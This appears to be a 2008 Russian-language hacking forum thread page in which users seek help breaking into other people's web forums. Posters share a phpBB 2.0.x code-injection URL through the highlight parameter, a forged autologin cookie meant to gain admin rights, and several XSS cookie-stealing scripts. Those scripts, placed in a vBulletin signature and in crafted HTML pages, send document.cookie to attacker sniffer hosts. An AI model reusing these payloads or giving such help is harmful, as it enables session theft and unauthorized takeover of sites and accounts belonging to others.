HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Задай Вопрос - Получи Ответ]
   
Ответ
Страница 8 из 32 « Первая < 4 5 6 7 8 9 10 11 12 18 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.11.2008, 21:43
Schneider
Новичок
Регистрация: 18.11.2008
Сообщений: 1
Провел на форуме:
10719

Репутация: 0
По умолчанию
Здраствуйте.
подскажите пожалуйста начинающему..
есть форум. 100% дырявый..
phpBB
Через чанлог выяснил что 2.0.5
через /INSTALL 2.0.6

далее не знаю чем продолжить...
1) посмотрел видео (мне кажется достаточно известное) bazaphpbb, попробовал

Код:
http://сайт/forum/viewtopic.php?t=123456&highlight=%2527.$poster=`pwd`.%2527
(где 123456 как я понимаю номер темы)
ничего не выходит.
учетной записи id2 - нет.
Но точно знаю пользователей с правами админ - это 7 и 456.
подскажите пожалуйста что можно сделать ??

HTML выключен (в подписи в том числе)

P.S. пробовал замену куков

Код:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7
после чего зашел на форум заново. куки изменились. в одной
b%3A0%3B
в другой
c66d207fa56c2bb04c041c1ef1a54589
Последний раз редактировалось Schneider; 18.11.2008 в 22:28..
 
Ответить с цитированием

  #2  
Старый 12.11.2008, 11:20
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


По умолчанию
никак не сделаешь, если backup есть )
 
Ответить с цитированием

  #3  
Старый 17.11.2008, 00:24
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212

Репутация: 111
По умолчанию
Есть vBulletin 3.6.8.
Есть возможность использовать HMTL в подписи.
Что можно интересного сделать?
 
Ответить с цитированием

  #4  
Старый 18.11.2008, 00:56
Diablo
Участник форума
Регистрация: 07.11.2005
Сообщений: 166
Провел на форуме:
565212

Репутация: 111
По умолчанию
Ну раз интересного никто не посоветует, попробую просто пароли выведать. В подписи разместил скрипт
Цитата:
<script>img = new Image(); img.src = "http://domain.name/img.php?"+document.cookie;</script>
На сниффер приходять только bblastvisit, bblastactivity и bbthread_lastview (хмм). Хеша пароля нету, даже id юзера нету. Что за?
 
Ответить с цитированием

XSS
  #5  
Старый 18.11.2008, 21:21
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855

Репутация: 0
По умолчанию XSS
У меня один вопрос.
Не как не могу получить долгожданные куки.

Кто в состоянии помочь мне в моей затеи.
Я не делаю просто запрос на картинку, я хочу внедрить сниффер в ХТМЛ документ сделаный мною, это для того что бы не какие фильтры не спасли.

Вот примерные наброски, но через этот способ мне приходит только инфа о IP, хосте,
тоесть всё кроме кукисов.

<html>
<head>
<title>"*******"</title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript" type="text/javascript">
document.write("<img.src='http://na-s.ru/images/********_1.gif?' +document.cookie>");
document.title = "www.BU_GA_GA.ru";
window.status = "Пожалуйста подождите";
</script>
<body onload="LoadThisPage()";
<script language="JavaScript" type="text/javascript">
function LoadThisPage()
{
window.location.href = "http://na-s.ru/pictures/*********.jpg";
}
</script>
</body>
</html>
 
Ответить с цитированием

конвертер бд из vb в phpbb
  #6  
Старый 18.11.2008, 20:39
mad_xakep
Banned
Регистрация: 10.04.2007
Сообщений: 244
Провел на форуме:
2582771

Репутация: 264
По умолчанию конвертер бд из vb в phpbb
помоги плиз найти конвертер бд из vb в phpbb

просто спалили нулл над как нить базу перенести в другой двиг желатель в phpbb
и ваще это реально с вб куда либо базу конвертировать?
 
Ответить с цитированием

  #7  
Старый 18.11.2008, 20:47
Jer1cho
Участник форума
Регистрация: 06.06.2008
Сообщений: 162
Провел на форуме:
3942177

Репутация: 244
По умолчанию
http://www.phpbb.com/community/viewtopic.php?f=10&t=325692
google.com
 
Ответить с цитированием

  #8  
Старый 18.11.2008, 21:35
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
По умолчанию
NooB MC

А не проще зделать так?

Код:
<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>
 
Ответить с цитированием

  #9  
Старый 18.11.2008, 22:16
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855

Репутация: 0
По умолчанию
Цитата:
Сообщение от cash$$$  
NooB MC

А не проще зделать так?

Код:
<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>
Составил такой документ

<html>
<head>
<title> proverka </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript">
document.images[0].src="http://na-s.ru/images/***********_1.gif?"+document.cookie;
</script>
</body>

Но к сожалению ничего не выходит.
(при использовании этого совета картинка должна
быть видимой или нет?)
</html>
 
Ответить с цитированием

  #10  
Старый 18.11.2008, 21:38
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
Провел на форуме:
25855

Репутация: 0
По умолчанию
спасиба попробую, если что отпишусь.
 
Ответить с цитированием
Ответ
Страница 8 из 32 « Первая < 4 5 6 7 8 9 10 11 12 18 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.